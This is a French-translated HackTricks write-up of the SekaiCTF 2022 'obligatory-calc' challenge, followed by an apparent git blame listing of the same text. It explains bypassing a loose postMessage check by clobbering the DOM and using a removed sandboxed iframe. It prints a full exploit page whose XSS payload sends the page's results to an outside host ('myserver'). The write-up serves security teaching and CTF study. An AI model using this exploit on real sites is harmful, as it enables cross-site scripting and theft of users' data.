hacktricks/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md

## Iframes dans SOP-2

Dans la [**solution**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc/solution) de ce [**challenge**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc), [**@Strellic\_**](https://twitter.com/Strellic\_) propose une méthode similaire à la section précédente. Voyons cela.

Dans ce défi, l'attaquant doit **contourner** ceci :
```javascript
if (e.source == window.calc.contentWindow && e.data.token == window.token) {
```
S'il le fait, il peut envoyer un **postmessage** avec du contenu HTML qui sera écrit dans la page avec **`innerHTML`** sans assainissement (**XSS**).

La façon de contourner la **première vérification** consiste à rendre **`window.calc.contentWindow`** **`undefined`** et **`e.source`** **`null`**:

* **`window.calc.contentWindow`** est en fait **`document.getElementById("calc")`**. Vous pouvez écraser **`document.getElementById`** avec **`<img name=getElementById />`** (notez que l'API Sanitizer -[ici](https://wicg.github.io/sanitizer-api/#dom-clobbering)- n'est pas configurée pour protéger contre les attaques de substitution de DOM dans son état par défaut).
  * Par conséquent, vous pouvez écraser **`document.getElementById("calc")`** avec **`<img name=getElementById /><div id=calc></div>`**. Ensuite, **`window.calc`** sera **`undefined`**.
  * Maintenant, nous avons besoin que **`e.source`** soit **`undefined`** ou **`null`** (parce que `==` est utilisé au lieu de `===`, **`null == undefined`** est **`True`**). Obtenir cela est "facile". Si vous créez un **iframe** et **envoyez** un **postMessage** depuis celui-ci et immédiatement **supprimez** l'iframe, **`e.origin`** sera **`null`**. Vérifiez le code suivant
```javascript
let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null
```
Afin de contourner la **deuxième vérification** concernant le jeton, il suffit d'envoyer **`token`** avec la valeur `null` et de faire en sorte que la valeur de **`window.token`** soit **`undefined`** :

* L'envoi de `token` dans le postMessage avec la valeur `null` est trivial.
* **`window.token`** est appelé dans la fonction **`getCookie`** qui utilise **`document.cookie`**. Notez que tout accès à **`document.cookie`** dans les pages d'origine **null** déclenche une **erreur**. Cela fera en sorte que **`window.token`** ait une valeur **`undefined`**.

La solution finale proposée par [**@terjanq**](https://twitter.com/terjanq) est la [**suivante**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-calc-html) :
```html
<html>
    <body>
        <script>
            // Abuse "expr" param to cause a HTML injection and
            // clobber document.getElementById and make window.calc.contentWindow undefined
            open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');
            
            function start(){
                var ifr = document.createElement('iframe');
                // Create a sandboxed iframe, as sandboxed iframes will have origin null
                // this null origin will document.cookie trigger an error and window.token will be undefined
                ifr.sandbox = 'allow-scripts allow-popups';
                ifr.srcdoc = `<script>(${hack})()<\/script>`
                
                document.body.appendChild(ifr);
                
                function hack(){
                    var win = open('https://obligatory-calc.ctf.sekai.team');
                    setTimeout(()=>{
                        parent.postMessage('remove', '*');
                        // this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
                        // token=null equals to undefined and e.source will be null so null == undefined
                        win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
                    },1000);
                }
                
                // this removes the iframe so e.source becomes null in postMessage event.
                onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
            }
            setTimeout(start, 1000);
        </script>
    </body>
</html>
```
<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Travaillez-vous dans une entreprise de **cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au [dépôt hacktricks](https://github.com/carlospolop/hacktricks) et au [dépôt hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
Translated to French 2023-06-03 13:10:46 +00:00			`## Iframes dans SOP-2`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Dans la [solution](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc/solution) de ce [challenge](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc), [@Strellic\_](https://twitter.com/Strellic\_) propose une méthode similaire à la section précédente. Voyons cela.`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Dans ce défi, l'attaquant doit contourner ceci :`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00			```javascript
			`if (e.source == window.calc.contentWindow && e.data.token == window.token) {`
			```
Translated to French 2023-06-03 13:10:46 +00:00			S'il le fait, il peut envoyer un postmessage avec du contenu HTML qui sera écrit dans la page avec `innerHTML` sans assainissement (XSS).
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			La façon de contourner la première vérification consiste à rendre `window.calc.contentWindow` `undefined` et `e.source` `null`:
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			* `window.calc.contentWindow` est en fait `document.getElementById("calc")`. Vous pouvez écraser `document.getElementById` avec `<img name=getElementById />` (notez que l'API Sanitizer -[ici](https://wicg.github.io/sanitizer-api/#dom-clobbering)- n'est pas configurée pour protéger contre les attaques de substitution de DOM dans son état par défaut).
			* Par conséquent, vous pouvez écraser `document.getElementById("calc")` avec `<img name=getElementById /><div id=calc></div>`. Ensuite, `window.calc` sera `undefined`.
			* Maintenant, nous avons besoin que `e.source` soit `undefined` ou `null` (parce que `==` est utilisé au lieu de `===`, `null == undefined` est `True`). Obtenir cela est "facile". Si vous créez un iframe et envoyez un postMessage depuis celui-ci et immédiatement supprimez l'iframe, `e.origin` sera `null`. Vérifiez le code suivant
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00			```javascript
			`let iframe = document.createElement('iframe');`
			`document.body.appendChild(iframe);`
			`window.target = window.open("http://localhost:8080/");`
			`await new Promise(r => setTimeout(r, 2000)); // wait for page to load`
			iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
			`document.body.removeChild(iframe); //e.origin === null`
			```
Translated to French 2023-06-03 13:10:46 +00:00			Afin de contourner la deuxième vérification concernant le jeton, il suffit d'envoyer `token` avec la valeur `null` et de faire en sorte que la valeur de `window.token` soit `undefined` :
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			* L'envoi de `token` dans le postMessage avec la valeur `null` est trivial.
			* `window.token` est appelé dans la fonction `getCookie` qui utilise `document.cookie`. Notez que tout accès à `document.cookie` dans les pages d'origine null déclenche une erreur. Cela fera en sorte que `window.token` ait une valeur `undefined`.
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`La solution finale proposée par [@terjanq](https://twitter.com/terjanq) est la [suivante](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-calc-html) :`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00			```html
			`<html>`
			`<body>`
			`<script>`
			`// Abuse "expr" param to cause a HTML injection and`
			`// clobber document.getElementById and make window.calc.contentWindow undefined`
			`open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');`

			`function start(){`
			`var ifr = document.createElement('iframe');`
			`// Create a sandboxed iframe, as sandboxed iframes will have origin null`
			`// this null origin will document.cookie trigger an error and window.token will be undefined`
			`ifr.sandbox = 'allow-scripts allow-popups';`
			ifr.srcdoc = `<script>(${hack})()<\/script>`

			`document.body.appendChild(ifr);`

			`function hack(){`
			`var win = open('https://obligatory-calc.ctf.sekai.team');`
			`setTimeout(()=>{`
			`parent.postMessage('remove', '*');`
			`// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because`
			`// token=null equals to undefined and e.source will be null so null == undefined`
			win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
			`},1000);`
			`}`

			`// this removes the iframe so e.source becomes null in postMessage event.`
			`onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }`
			`}`
			`setTimeout(start, 1000);`
			`</script>`
			`</body>`
			`</html>`
			```
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`* Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
			`* Découvrez [The PEASS Family](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Rejoignez le [💬](https://emojipedia.org/speech-balloon/) [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou suivez moi sur Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Partagez vos astuces de piratage en soumettant des PR au [dépôt hacktricks](https://github.com/carlospolop/hacktricks) et au [dépôt hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
			`</details>`